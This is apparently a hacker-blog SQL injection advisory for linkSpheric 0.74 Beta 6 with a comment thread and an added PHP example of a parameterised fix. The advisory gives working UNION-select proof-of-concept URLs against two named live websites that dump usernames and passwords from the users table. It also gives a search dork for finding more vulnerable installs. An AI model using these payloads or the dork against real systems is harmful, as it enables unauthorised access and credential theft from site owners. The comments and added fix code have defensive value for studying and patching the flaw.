linkSpheric 0.74 Beta 6 SQL Injection Vuln


[o] linkSpheric 0.74 Beta 6 SQL Injection Vulnerability
Software : linkSpheric version 0.74 Beta 6
Vendor : http://dataspheric.com/
Download : http://sourceforge.net/projects/linkspheric/
Author : NoGe

[o] Vulnerable file
viewListing.php

[o] Exploit
http://localhost/[path]/viewListing.php?listID=[SQL]

[o] Proof of concept
http://dataspheric.com/directory/viewListing.php?listID=-52+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(userName,0x3a,password),21,22,23,24,25,26,27,28+from+users--
http://pcmsite.net/links/viewListing.php?listID=-5+union+select+1,2,3,4,5,6,7,8,group_concat(userName,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users--

[o] Dork
"Powered by linkSpheric"

Comments

Anonymous said…
Hello!

I represent the group of friends who wrote linkSpheric. LOL!!

It might seem that you have successfully penetrated this database. I think this is an important consideration for users of linkSpheric software because it was originally designed around php3 and has not been an active project for some years.

However, because linkSpheric is directory software, in other words, the information contained in a linkSpheric directory is intended to be public, I do not consider this to be a big deal.

I congratulate the hacker. And if you have seen Viper, tell him I send my regards and best wishes.
evilc0de said…
hello too..

i'm looking for bugs
and your script is buggy
so i post it up
i don't change any databases

btw, who is Viper??
i don't know him.
Anonymous said…
You are correct. linkSpheric was never completed. This is why we decided to give it away for free :)

I know you did not harm the database. But I think you were able to execute a script. One of the records you found contains the name of my friend Viper. I thought it is possible that you are Viper playing a joke on me.

We no longer work on linkSpheric. If you want to, you can repair this vulnerability and you will get full credit. You will find the source code here:

http://sourceforge.net/projects/linkspheric/

Because linkSpheric is used by so many people in many different countries, I think it is possible that many people will thank you if you fix this vulnerability.

I hope you have a good weekend.
Jack said…
it just takes 2 minutes to patch it :) believe me
Vrs-hCk said…
68: $result = mysql_query("SELECT * FROM listings WHERE id = '$listID' ");

Try to fix viewListing.php with this line :)
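
Added example, not part of the original post, the comments, or linkSpheric's own code: the listing lookup with listID validated as a positive integer and bound as a parameter, next to an assumed shape of the unpatched query. The table and column names (listings, id) follow the line quoted above; the function names, the PDO/SQLite setup (needs the pdo_sqlite extension) and the sample rows are constructed.

```php
<?php
// Added example, not linkSpheric's code. Table and column names (listings, id)
// follow the query line quoted in the thread; the SQLite schema, rows and
// function names are constructed so the script runs offline.

// Assumed shape of the unpatched lookup: the parameter is pasted into the SQL text.
function fetchListingUnsafe(PDO $db, string $rawListID): array
{
    $sql = "SELECT id, title FROM listings WHERE id = $rawListID";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened lookup: listID must be a positive integer and is bound, never interpolated.
function fetchListing(PDO $db, string $rawListID): array
{
    $listID = filter_var($rawListID, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($listID === false) {
        return [];                      // reject anything that is not a plain id
    }
    $stmt = $db->prepare('SELECT id, title FROM listings WHERE id = :id');
    $stmt->bindValue(':id', $listID, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE listings (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec('CREATE TABLE users (userName TEXT, password TEXT)');
$db->exec("INSERT INTO listings VALUES (1, 'Example listing')");
$db->exec("INSERT INTO users VALUES ('admin', 'constructed-hash')");

// Constructed inputs: a valid id, then a shortened form of the UNION shape in the advisory.
$inputs = ['1', '-5 union select userName, password from users--'];
foreach ($inputs as $in) {
    printf("input   : %s\n", $in);
    printf("unsafe  : %s\n", json_encode(fetchListingUnsafe($db, $in)));
    printf("hardened: %s\n\n", json_encode(fetchListing($db, $in)));
}
```

The bound integer cannot change the statement's structure, so the lookup does not depend on the input having been escaped somewhere else in the request path.
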
Anonymous said…
i think you should take responsibility. it is good to be a hacker, but you can be more professional.

i can tell my programmer to fix the code or you can do it.

i think you deserve the credit. i think this will be good for you.

do you want a job?
Anonymous said…
friend, now everybody is hacking me. what have you done to me?
Anonymous said…
lols. ok. i thought you were attacking me because i am muslim. no problem.

you must understand that i am old and retired. i am not a young man. i use all the money i get now to feed my kids. so you are smart and young. i have no desire to fight with you.

but i also appreciate your sense of humor.

can i bless you?

May God, Allah, bless you and keep you
May Allah make His face to shine upon you. May Allah give you increase, both you and your children so that you may dwell in the house of Allah forever. So that you will be happy.

Bless you hacker. you are a good hacker.
Jack said…
woooyoooo ^^
feel the sensation.

Ge, take the code, patch, and re-publish. full credits eh?

stupid code